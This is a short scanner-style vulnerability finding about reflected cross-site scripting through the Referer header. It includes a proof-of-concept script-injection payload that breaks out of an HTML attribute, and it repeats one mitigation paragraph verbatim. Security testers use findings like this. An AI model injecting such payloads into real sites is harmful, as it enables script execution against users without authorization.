Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcec4"><script>alert(1)</script>765084d5be8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.